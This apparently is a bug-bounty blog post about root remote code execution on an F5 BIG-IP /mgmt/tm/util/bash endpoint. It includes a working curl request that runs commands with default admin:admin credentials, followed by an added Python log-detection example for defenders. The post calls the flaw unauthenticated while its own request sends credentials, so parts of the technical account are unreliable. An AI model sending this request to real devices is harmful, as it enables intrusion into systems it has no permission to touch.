How I Accidentally Became the Sherlock Holmes of RCE! and made $$$

2 days ago 9

Iski


Hi there!🙌


Some people wake up and choose coffee, others choose chaos. I apparently chose both. One fine morning, instead of scrolling endlessly through memes, I decided to play detective on the internet. And guess what? I stumbled upon something juicier than my favorite street-side samosa — a Remote Code Execution (RCE) vulnerability!

Let me spill the beans on how that went down.

It was one of those days when even my phone notifications were silent. With no drama left in my life, I thought, why not create some myself? Bug bounty time! 🛡️

Scrolling through programs, I decided to test a well-known enterprise app. The world loves a good challenge, and I love poking into servers that occasionally fight back. After some recon (because real hackers always do recon, duh), I started finding juicy endpoints.

Here’s my simple game plan:

Subfinder and Amass for subdomain enumeration
Nuclei for vulnerability detection
Burp Suite to sniff out the sweet stuff
Wappalyzer to confirm what I’m dealing with

While casually sipping on my chai, I hit an endpoint: /mgmt/tm/util/bash. At first glance, it seemed like a boring admin panel. But the detective in me said, "Something's fishy!"

I remembered a CVE (CVE-2023-46747) about F5 BIG-IP unauthenticated RCE. This vulnerability allows attackers to execute system commands without credentials. Spicy, right?

With a grin, I ran my Nuclei scanner and within seconds — BOOM! I had command execution.

curl -k -X POST https://target.com/mgmt/tm/util/bash \
-H "Authorization: Basic YWRtaW46YWRtaW4=" \
-d '{"command":"run","utilCmdArgs":"-c id"}'

Response:

{
"commandResult": "uid=0(root) gid=0(root)"
}
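
For defenders, requests like the one above can be spotted in web access logs. The following is an added example, not code from the original post or from F5: it flags logged requests to /mgmt/tm/util/bash that come from outside a management network, and checks whether a captured Basic Authorization header (such as the one in the curl command) decodes to the default admin:admin pair. The Apache-style log layout, the management subnet, the sample lines and all function names are assumptions made for the example.

```python
import base64
import ipaddress
import re

# Endpoint path from the article; log layout and names below are assumptions.
UTIL_BASH_PATH = "/mgmt/tm/util/bash"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def find_util_bash_hits(lines, mgmt_networks):
    """Return one finding per logged request to the util/bash endpoint."""
    nets = [ipaddress.ip_network(n) for n in mgmt_networks]
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0].rstrip("/").lower()
        if path != UTIL_BASH_PATH:
            continue
        src = ipaddress.ip_address(m["src"])
        findings.append({
            "src": str(src), "user": m["user"], "method": m["method"],
            "status": int(m["status"]),
            "outside_mgmt_net": not any(src in n for n in nets),
            "succeeded": m["status"].startswith("2"),
        })
    return findings

def uses_default_admin_credentials(authorization_header):
    """True if a Basic Authorization header decodes to admin:admin."""
    scheme, _, token = authorization_header.partition(" ")
    if scheme.lower() != "basic":
        return False
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return False
    return decoded == "admin:admin"

# Constructed sample lines (not real traffic); documentation address ranges.
SAMPLE_LOG = [
    '10.0.5.20 - admin [12/Jan/2024:09:14:02 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 64',
    '203.0.113.77 - admin [12/Jan/2024:09:15:40 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 71',
    '203.0.113.77 - - [12/Jan/2024:09:15:41 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.9 - - [12/Jan/2024:09:16:03 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 401 0',
]
```

A finding with both `outside_mgmt_net` and `succeeded` set is the case to triage first; restricting the management interface to a dedicated network and replacing default credentials removes both conditions.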